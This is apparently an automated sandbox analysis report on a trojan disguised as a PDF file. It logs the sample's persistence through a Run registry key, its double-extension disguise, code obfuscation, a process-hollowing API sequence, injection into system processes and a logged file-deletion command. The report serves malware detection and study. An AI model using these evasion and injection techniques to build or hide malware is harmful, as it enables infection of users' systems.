Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Code function: 0_2_004021C0		0_2_004021C0
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Code function: 0_2_004342B4		0_2_004342B4
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_004021C0		6_2_004021C0
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_004342B4		6_2_004342B4
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_0044F3A8		6_2_0044F3A8
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010BF900		7_2_010BF900
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B0D20		7_2_010B0D20
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010D4120		7_2_010D4120
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01181D55		7_2_01181D55
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E2581		7_2_010E2581
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010CD5E0		7_2_010CD5E0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C841F		7_2_010C841F
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01171002		7_2_01171002
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010CB090		7_2_010CB090
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E20A0		7_2_010E20A0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_011820A8		7_2_011820A8
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010EEBB0		7_2_010EEBB0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010D6E30		7_2_010D6E30
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01182EF7		7_2_01182EF7
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 10_2_004021C0		10_2_004021C0
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 10_2_004342B4		10_2_004342B4
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 10_2_0044F3A8		10_2_0044F3A8
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 10_2_035920B4		10_2_035920B4

Found potential string decryption / allocating functions

Show sources

Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: String function: 00404760 appears 41 times
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: String function: 0040FA38 appears 44 times
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: String function: 0040473C appears 178 times
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: String function: 00406B0C appears 124 times
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: String function: 035A3FD0 appears 62 times
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: String function: 00406878 appears 33 times
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: String function: 035A552C appears 43 times
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: String function: 035947DC appears 67 times
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: String function: 00403928 appears 31 times
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: String function: 00403CDC appears 51 times
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: String function: 00404F48 appears 37 times
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: String function: 0040E74C appears 42 times
Source: C:\Windows\SysWOW64\logagent.exe	Code function: String function: 010BB150 appears 35 times

Contains functionality to call native functions

Show sources

Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,		7_2_010F9910
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9540 NtReadFile,LdrInitializeThunk,		7_2_010F9540
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F99A0 NtCreateSection,LdrInitializeThunk,		7_2_010F99A0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F95D0 NtClose,LdrInitializeThunk,		7_2_010F95D0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9840 NtDelayExecution,LdrInitializeThunk,		7_2_010F9840
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9860 NtQuerySystemInformation,LdrInitializeThunk,		7_2_010F9860
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F98F0 NtReadVirtualMemory,LdrInitializeThunk,		7_2_010F98F0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9710 NtQueryInformationToken,LdrInitializeThunk,		7_2_010F9710
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9780 NtMapViewOfSection,LdrInitializeThunk,		7_2_010F9780
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F97A0 NtUnmapViewOfSection,LdrInitializeThunk,		7_2_010F97A0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9FE0 NtCreateMutant,LdrInitializeThunk,		7_2_010F9FE0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9A00 NtProtectVirtualMemory,LdrInitializeThunk,		7_2_010F9A00
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9A20 NtResumeThread,LdrInitializeThunk,		7_2_010F9A20
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9A50 NtCreateFile,LdrInitializeThunk,		7_2_010F9A50
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9660 NtAllocateVirtualMemory,LdrInitializeThunk,		7_2_010F9660
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F96E0 NtFreeVirtualMemory,LdrInitializeThunk,		7_2_010F96E0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9520 NtWaitForSingleObject,		7_2_010F9520
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010FAD30 NtSetContextThread,		7_2_010FAD30
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9950 NtQueueApcThread,		7_2_010F9950
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9560 NtWriteFile,		7_2_010F9560
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F99D0 NtCreateProcessEx,		7_2_010F99D0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F95F0 NtQueryInformationFile,		7_2_010F95F0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9820 NtEnumerateKey,		7_2_010F9820
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010FB040 NtSuspendThread,		7_2_010FB040
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F98A0 NtWriteVirtualMemory,		7_2_010F98A0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9B00 NtSetValueKey,		7_2_010F9B00
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010FA710 NtOpenProcessToken,		7_2_010FA710
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9730 NtQueryVirtualMemory,		7_2_010F9730
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9760 NtOpenProcess,		7_2_010F9760
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9770 NtSetInformationFile,		7_2_010F9770
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010FA770 NtOpenThread,		7_2_010FA770
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010FA3B0 NtGetContextThread,		7_2_010FA3B0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9A10 NtQuerySection,		7_2_010F9A10
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9610 NtEnumerateValueKey,		7_2_010F9610
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9650 NtQueryValueKey,		7_2_010F9650
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9670 NtQueryInformationProcess,		7_2_010F9670
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F9A80 NtOpenDirectoryObject,		7_2_010F9A80
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F96D0 NtCreateKey,		7_2_010F96D0
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 10_2_0359CB3C CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,		10_2_0359CB3C

PE file contains strange resources

Show sources

Source: DOC209272621615.PDF.exe	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Wkklnmcz.exe.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Show sources

Source: C:\Users\user\Contacts\Wkklnmcz.exe	Section loaded: amsiproxy.dll			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Section loaded: amsiproxy.dll			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Section loaded: amsiproxy.dll			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Section loaded: amsiproxy.dll			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Section loaded: amsiproxy.dll			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Section loaded: amsiproxy.dll			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Section loaded: amsiproxy.dll			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Section loaded: amsiproxy.dll			Jump to behavior

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Show sources

Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory allocated: 72480000 page execute and read and write			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory allocated: 72480000 page execute and read and write			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory allocated: 72480000 page no access			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory allocated: 72480000 page read and write			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory allocated: 72481000 page read and write			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory allocated: 72480000 page execute and read and write			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory allocated: 72480000 page execute and read and write			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory allocated: 72480000 page no access			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory allocated: 72480000 page read and write			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory allocated: 72481000 page read and write			Jump to behavior

Sample is known by Antivirus

Show sources

Source: DOC209272621615.PDF.exe

ReversingLabs: Detection: 33%

Sample reads its own file content

Show sources

Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe

File read: C:\Users\user\Desktop\DOC209272621615.PDF.exe

Jump to behavior

Reads software policies

Show sources

Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Show sources

Source: unknown	Process created: C:\Users\user\Desktop\DOC209272621615.PDF.exe "C:\Users\user\Desktop\DOC209272621615.PDF.exe"
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5616 -s 2132
Source: unknown	Process created: C:\Users\user\Contacts\Wkklnmcz.exe "C:\Users\user\Contacts\Wkklnmcz.exe"
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Contacts\Wkklnmcz.exe "C:\Users\user\Contacts\Wkklnmcz.exe"
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\logagent.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mobsync.exe	Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe			Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\logagent.exe"			Jump to behavior

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Creates files inside the user directory

Show sources

Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Wkklnmczcyrsyafzucgflytssyuynbb[1]

Jump to behavior

Creates temporary files

Show sources

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2119.tmp

Jump to behavior

Classification label

Show sources

Source: classification engine

Classification label: mal100.troj.evad.winEXE@17/11@23/18

Contains functionality to check free disk space

Show sources

Source: C:\Users\user\Contacts\Wkklnmcz.exe

Code function: 6_2_00408F92 GetDiskFreeSpaceA,

6_2_00408F92

Contains functionality for error logging

Show sources

Source: C:\Users\user\Contacts\Wkklnmcz.exe

Code function: 6_2_00426B6C GetLastError,FormatMessageA,

6_2_00426B6C

Parts of this applications are using Borland Delphi (Probably coded in Delphi)

Show sources

Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Runs a DLL by calling functions

Show sources

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Creates mutexes

Show sources

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5616
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2940:120:WilError_01

Contains functionality to load and extract PE file embedded resources

Show sources

Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe

Code function: 0_2_0041A3B4 FindResourceA,

0_2_0041A3B4

Reads the hosts file

Show sources

Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Binary contains paths to debug symbols

Show sources

Source:	Binary string: cryptbase.pdbt source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: WWAHost.pdb source: mobsync.exe, 0000000C.00000002.462120401.0000000005040000.00000040.00020000.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: nCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwinmm.pdb source: WerFault.exe, 00000005.00000002.328390174.00000000009E2000.00000004.00000001.sdmp
Source:	Binary string: WWAHost.pdbUGP source: mobsync.exe, 0000000C.00000002.462120401.0000000005040000.00000040.00020000.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: logagent.exe, 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp, logagent.exe, 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, mobsync.exe, 0000000C.00000002.461547697.0000000004CBF000.00000040.00000001.sdmp, mobsync.exe, 0000000C.00000002.460534090.0000000004BA0000.00000040.00000001.sdmp, rundll32.exe, 00000012.00000002.816777544.0000000004690000.00000040.00000001.sdmp, rundll32.exe, 00000012.00000002.817065918.00000000047AF000.00000040.00000001.sdmp, WWAHost.exe, 00000016.00000002.461781268.0000000003BBF000.00000040.00000001.sdmp, WWAHost.exe, 00000016.00000002.461510475.0000000003AA0000.00000040.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp, logagent.exe, logagent.exe, 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp, logagent.exe, 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, mobsync.exe, 0000000C.00000002.461547697.0000000004CBF000.00000040.00000001.sdmp, mobsync.exe, 0000000C.00000002.460534090.0000000004BA0000.00000040.00000001.sdmp, rundll32.exe, 00000012.00000002.816777544.0000000004690000.00000040.00000001.sdmp, rundll32.exe, 00000012.00000002.817065918.00000000047AF000.00000040.00000001.sdmp, WWAHost.exe, 00000016.00000002.461781268.0000000003BBF000.00000040.00000001.sdmp, WWAHost.exe, 00000016.00000002.461510475.0000000003AA0000.00000040.00000001.sdmp
Source:	Binary string: rundll32.pdb source: logagent.exe, 00000007.00000002.434750014.00000000049A0000.00000040.00020000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: logagent.exe, 00000007.00000002.434750014.00000000049A0000.00000040.00020000.sdmp
Source:	Binary string: winmm.pdb source: WerFault.exe, 00000005.00000003.303898040.0000000004EE0000.00000004.00000001.sdmp
Source:	Binary string: a7~winmm.pdb source: WerFault.exe, 00000005.00000003.304269089.0000000004F64000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.303618478.0000000004F5E000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.304006492.0000000004F64000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.304486310.0000000004F64000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: logagent.pdb source: rundll32.exe, 00000012.00000002.811265717.00000000004C4000.00000004.00000020.sdmp, rundll32.exe, 00000012.00000002.817526950.0000000004BC7000.00000004.00020000.sdmp
Source:	Binary string: winmm.pdb( source: WerFault.exe, 00000005.00000003.303898040.0000000004EE0000.00000004.00000001.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: logagent.pdbGCTL source: rundll32.exe, 00000012.00000002.811265717.00000000004C4000.00000004.00000020.sdmp, rundll32.exe, 00000012.00000002.817526950.0000000004BC7000.00000004.00020000.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Code function: 0_2_004600AC push 00460125h; ret		0_2_0046011D
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Code function: 0_2_004605D0 push 0046065Dh; ret		0_2_00460655
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Code function: 0_2_0041606E push 004160E6h; ret		0_2_004160DE
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Code function: 0_2_00416070 push 004160E6h; ret		0_2_004160DE
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Code function: 0_2_00460144 push 004601ECh; ret		0_2_004601E4
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Code function: 0_2_0040E114 push 0040E29Ah; ret		0_2_0040E292
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Code function: 0_2_004601F8 push 00460288h; ret		0_2_00460280
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Code function: 0_2_0044A2F0 push ecx; mov dword ptr [esp], edx		0_2_0044A2F4
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Code function: 0_2_00420280 push ecx; mov dword ptr [esp], edx		0_2_00420282
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Code function: 0_2_0042E3D0 push 0042E41Ch; ret		0_2_0042E414
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Code function: 0_2_0041645C push ecx; mov dword ptr [esp], ecx		0_2_0041645F
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Code function: 0_2_0041643C push ecx; mov dword ptr [esp], ecx		0_2_0041643F
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Code function: 0_2_0044A594 push ecx; mov dword ptr [esp], edx		0_2_0044A598
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_004600AC push 00460125h; ret		6_2_0046011D
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_004605D0 push 0046065Dh; ret		6_2_00460655
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_0041606E push 004160E6h; ret		6_2_004160DE
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_00416070 push 004160E6h; ret		6_2_004160DE
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_00460144 push 004601ECh; ret		6_2_004601E4
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_0040E114 push 0040E29Ah; ret		6_2_0040E292
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_004601F8 push 00460288h; ret		6_2_00460280
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_0044A2F0 push ecx; mov dword ptr [esp], edx		6_2_0044A2F4
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_00420280 push ecx; mov dword ptr [esp], edx		6_2_00420282
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_0042E3D0 push 0042E41Ch; ret		6_2_0042E414
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_0041645C push ecx; mov dword ptr [esp], ecx		6_2_0041645F
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_0041643C push ecx; mov dword ptr [esp], ecx		6_2_0041643F
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_0044A594 push ecx; mov dword ptr [esp], edx		6_2_0044A598
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_0045E634 push 0045E6B1h; ret		6_2_0045E6A9
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_00458734 push 0045878Eh; ret		6_2_00458786
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_004607CC push 00460834h; ret		6_2_0046082C
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_0040679E push 004067FBh; ret		6_2_004067F3
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_004067A0 push 004067FBh; ret		6_2_004067F3

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe

Code function: 0_2_0045ED90 LoadLibraryA,GetProcAddress,

0_2_0045ED90

Persistence and Installation Behavior:

Drops PE files

Show sources

Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe

File created: C:\Users\user\Contacts\Wkklnmcz.exe

Jump to dropped file

Boot Survival:

Creates an autostart registry key

Show sources

Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Wkklnmcz			Jump to behavior
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Wkklnmcz			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Uses an obfuscated file name to hide its real file extension (double extension)

Show sources

Source: Possible double extension: pdf.exe

Static PE information: DOC209272621615.PDF.exe

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Show sources

Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Code function: 0_2_0045603C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,		0_2_0045603C
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_0045603C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,		6_2_0045603C
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_0045676C IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,		6_2_0045676C
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_00442700 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,		6_2_00442700
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: 6_2_00456830 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,		6_2_00456830
